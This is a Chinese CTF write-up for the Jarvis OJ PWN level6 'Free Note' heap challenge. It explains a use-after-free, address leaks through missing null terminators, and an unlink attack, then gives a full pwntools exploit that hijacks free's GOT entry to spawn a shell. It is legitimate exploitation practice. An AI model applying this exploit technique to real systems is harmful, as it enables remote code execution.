Jarvis OJ PWN level6 WriteUp

终于做完了自己在pwn方向的第一道堆题,参考了writeup1和writeup2怼了四天,终于理解了整道题目,本地调通了,但是题目服务器貌似有点问题,题目提供的libc偏移对不上,远程没有调通

整体思路

  1. 泄露出libc的基址和heap的地址
  2. 根据泄露的libc基址算出system函数的基址
  3. 伪造chunk,free掉伪造的chunk触发unlink,使得可以任意地址写
  4. 劫持got表中的free为system函数地址,调用删除功能,getshell

具体分析

首先查看程序功能:

== Blue-lotus Free Note ==
1. List Note
2. New Note
3. Edit Note
4. Delete Note
5. Exit
====================
Your choice:

再拖入IDA看一下逻辑。找到可以利用的地方:

  1. 程序一开始malloc一个3096大小的堆用来管理之后创建的note
  2. delete功能在free之后没有将指针置空,可以进行利用
  3. 在new note的时候,尾部没有加上\x00,可以用来进行地址泄露
  4. 在new note的时候,有逻辑判断让malloc的chunk至少为136大小,属于small chunk的范畴,可以使用unlink

地址泄露

libc地址泄露的具体原理为:

  1. 由于在写入的时候没有加上\x00,所以在输出的时候可以也一直输出到之后的\x00为止。
  2. 当chunk被free掉后fd和bk指针会的值为,而与libc加载地址的相对偏移是固定的。所以只需要泄露出,再在本地调试找到算出libc和main_arena的偏移,便能知道libc的基址
  3. 最终操作为:创建两个note(chunk)(防止top chunk的合并)=>free掉第一个=>再创建note(这时候申请的chunk的大小要与free掉的一致才能申请到原来的空间,且输入的大小不能超过四个字节,否则会覆盖地址信息)=>list note拿到地址信息

heap地址泄露的原理为:当两个不相邻的chunk被free掉时,会至于bin的链表中,本例中会先放到unsorted bin中,这时chunk的fd和bk中存有chunk的地址信息,接下来操作同上文则可泄露heap地址。

unlink

程序在最开始的时候,申请了一个堆作为note的管理,可以看到里面存储了note的地址,所以通过unlink伪造chunk的方式可以取得该区的控制权,从而能任意地址写,劫持got表。需要注意的是伪造chunk的大小要地址对齐。

exp

from pwn import *

context.log_level = 'debug'
#p = process('./freenote_x86')
#libc = ELF('./libc-2.19.so')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
elf = ELF('./freenote_x86')
p = remote('pwn2.jarvisoj.com',9885)
def newNote(length, content):
    p.recvuntil('Your choice: ')
    p.sendline('2')
    p.recvuntil('Length of new note: ')
    p.sendline(str(length))
    p.recvuntil('Enter your note: ')
    p.send(content)
    sleep(0.2)

def deleteNote(number):
    p.recvuntil('Your choice: ')
    p.sendline('4')
    p.recvuntil('Note number: ')
    p.sendline(str(number))

def editNote(number, length, content):
    p.recvuntil('Your choice: ')
    p.sendline('3')
    p.recvuntil('Note number: ')
    p.sendline(str(number))
    p.recvuntil('Length of note: ')
    p.sendline(str(length))
    p.recvuntil('Enter your note: ')
    p.sendline(content)

def listNote():
    p.recvuntil('Your choice: ')
    p.sendline('1')

if __name__ == '__main__':
# ======================================== leak libc address
    offset = 0x1b27b0 # main to libc
    newNote(7,'a'*7) # 0
    sleep(0.2)
    newNote(7,'b'*7) # 1
    sleep(0.2)
    deleteNote(0)
    newNote(1,'0')
    listNote()
    sleep(0.2)
    p.recv(7)
    main_addr = u32(p.recv(4))
    libc_addr = main_addr - offset
    system_addr = libc_addr + libc.symbols['system']
    print 'leak address:%x'%main_addr
    print 'libc address:%x'%libc_addr
# ========================================= leak heap address
    newNote(7,'c'*7) # 2
    newNote(7,'d'*7) # 3

    deleteNote(0)
    deleteNote(2)
    newNote(1,'0')
    listNote()
    sleep(0.2)
    p.recv(7)
    heap_base = u32(p.recv(4))-0xd28
    print 'heap address:%x'%heap_base
    deleteNote(0)
    deleteNote(1)
    deleteNote(3)
# ========================================= unlink
    payload = p32(0)+p32(0x81)+p32(heap_base+0x18-12)+p32(heap_base+0x18-8)# fakechunk1: prev_size size fd bk fill_data 0x88
    payload = payload.ljust(0x80,'a') 
    payload += p32(0x80)+p32(0x80) # fakechunk2: prev_size size fd-data 
    payload = payload.ljust(0x80*2,'a')
    newNote(len(payload),payload)
    sleep(0.2)
    deleteNote(1)
# ========================================= hijack got
    payload2 = p32(2)+p32(1)+p32(4)+p32(elf.got['free'])+p32(1)+p32(8)+p32(heap_base+0xca8)
    payload2 = payload2.ljust(0x80*2,'\x00')
    editNote(0,len(payload2),payload2)
    editNote(0,4,p32(system_addr))
    editNote(1,8,'/bin/sh\x00')
    print 'system address:%x'%system_addr
    # gdb.attach(p)
    deleteNote(1)
    p.interactive()

你可能感兴趣的:(Jarvis OJ PWN level6 WriteUp)